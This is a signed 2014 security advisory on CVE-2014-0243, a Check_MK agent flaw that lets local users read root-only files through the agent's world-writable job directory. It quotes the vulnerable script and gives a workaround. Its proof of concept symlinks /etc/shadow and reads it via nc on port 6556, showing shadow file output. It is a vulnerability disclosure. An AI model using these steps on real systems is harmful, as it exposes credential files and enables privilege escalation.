Check_MK Arbitrary File Disclosure

`  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===  
  
Check_MK - Arbitrary File Disclosure Vulnerability  
- --------------------------------------------------  
  
Affected Versions  
=================  
Linux versions of Check_MK equal or greater than commit  
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.  
  
Other platforms are not affected as the vulnerable feature is not  
implemented there.  
  
Issue Overview  
==============  
Technical Risk: high  
Likelihood of Exploitation: high  
Vendor: Mathias Kettner GmbH  
Credits: LSE Leading Security Experts GmbH employees  
Markus Vervier and Sascha Kettler  
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt  
Advisory Status: Public  
CVE-Number: CVE-2014-0243  
  
Issue Description  
=================  
While conducting a whitebox test LSE Leading Security Experts GmbH  
discovered that the Check_MK agent processes files from a directory  
with mode 1777. It is not checked if the files are symbolic or hard  
filesystem links.  
  
As the Check_MK agent runs with root permissions by default, it will  
read arbitrary files and readable devices with root permissions.  
  
The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200  
in commit 7e9088c09963cb2e76030e8b645607692ec56011:  
  
<<>>  
commit 7e9088c09963cb2e76030e8b645607692ec56011  
Author: Bernd Stroessenreuther <[email protected]>  
Date: Thu Sep 5 15:49:46 2013 +0200  
  
mk-job: /var/lib/check_mk_agent/job directory is now  
created with mode 1777 so mk-job can be used by  
unprivileged users too: fixing bug #1040  
<<>>  
  
The vulnerable code in the agent for reading job results from  
"/var/lib/check_mk_agent/job" is:  
  
<<>>  
# Get statistics about monitored jobs  
if cd /var/lib/check_mk_agent/job; then  
echo '<<<job>>>'  
head -n -0 -v *  
fi  
<<>>  
  
Impact  
======  
A local user may create a symbolic link in the directory  
"/var/lib/check_mk_agent/job", pointing to a file he normally would  
not have access to like "/etc/shadow". The agent expects output from  
jobs using the mk-job Tool in that directory. It will output the  
content of all files in the directory on TCP port 6556 by default.  
  
Temporary Workaround and Fix  
============================  
LSE Leading Security Experts GmbH advises to remove the write  
permissions and the sticky bit for non root users temporarily by  
setting mode 755 on the directory.  
  
Proof of Concept  
================  
[myhost]$ pwd  
/var/lib/check_mk_agent/job  
[myhost]$ ls -l  
total 0  
[myhost]$ ln -s /etc/shadow  
[myhost]$ ls -la  
total 4  
drwxrwxrwt 2 root root 4096 May 21 15:17 .  
drwxr-xr-x 3 root root 4096 Feb 26 13:54 ..  
lrwxrwxrwx 1 myuser mygroup 11 May 21 15:17 shadow -> /etc/shadow  
[myhost]$ nc 127.0.0.1 6556  
[...]  
<<<job>>>  
==> shadow <==  
root:$6$[...]:16133:0:99999:7:::  
bin:*:15937:0:99999:7:::  
daemon:*:15937:0:99999:7:::  
adm:*:15937:0:99999:7:::  
lp:*:15937:0:99999:7:::  
sync:*:15937:0:99999:7:::  
shutdown:*:15937:0:99999:7:::  
halt:*:15937:0:99999:7:::  
mail:*:15937:0:99999:7:::  
uucp:*:15937:0:99999:7:::  
operator:*:15937:0:99999:7:::  
games:*:15937:0:99999:7:::  
gopher:*:15937:0:99999:7:::  
ftp:*:15937:0:99999:7:::  
nobody:*:15937:0:99999:7:::  
[...]  
  
History  
=======  
2014-05-20 Issue discovery  
2014-05-21 Permission of customer for advisory  
2014-05-21 Vendor informed  
2014-05-22 CVE requested  
2014-05-22 Vendor response  
2014-05-22 CVE-2014-0243 assigned  
2014-05-26 Official fix available  
2014-05-27 Advisory release  
  
- --   
http://www.lsexperts.de  
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt  
Tel.: +49 (0) 6151 86086-0, Fax: -299,  
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649  
Geschäftsführer: Oliver Michel, Sven Walther  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2.0.22 (FreeBSD)  
  
iQIcBAEBAgAGBQJThYprAAoJEDgSCSGZ4yd8BgEP/07sJ4P4aByGKhCJmdmKo9+v  
IdGPSYWqWp2Y2iIuE0J8zIkss0SHwU6bFa27h5pIplqUNDFiu4ycOlCpUkx0yh/F  
z2DKxDGFQicegYHWj96Eagstj32P+vfo08yoLwxgC7vQawpbvTTM4edyunHUAuX9  
r4Pb9Ia2OjFP+ePpP4Vp4HVHWEmO9kpEjm7irMvN+5Ft/fiMrrfafFXQk7/TO3Xr  
jGyx+l/Hw0znGUWgRVPicaztpD72ZhYwYy1AC5mltXniqVDxP3xWjJMGrtwl4bW4  
o+GWTdOn9sEV8V+quvAz9SLCvmGCghaakJqKYmzVLVP4+2I3M6mcu2l/1pl6M5jE  
li+LScA9Fw6CwmUmk9gTduRTrHxcSWEzdRjrFll/Qh6DaU92YBTtfb5a7YCpFp+S  
7Yf/ECA0BXTsfhY+M3CNUBSiJRCW6NQABIH/maOsK/u/Mq/gFcV0R/gd24YMIq1F  
GzNzZPmNmGlqaZHcMijgdnJ9MKKxA/qLlhV4fAULafNq0fGz+gnp2H/CoJCLogLd  
euJWtvcgqhOd5/m8O8YUi9pmyioHq7GNeN0oz+9MLurVKGZqilxCGaU1OLfSrwzx  
z72qzSt3txs8+s72LGDMcw0/OOx0KYm3xYekzkRyOs4JkDOSIATAhvhSTbdp2myX  
Kt8H8xrSmzdyUbTISR3E  
=rbLP  
-----END PGP SIGNATURE-----  
`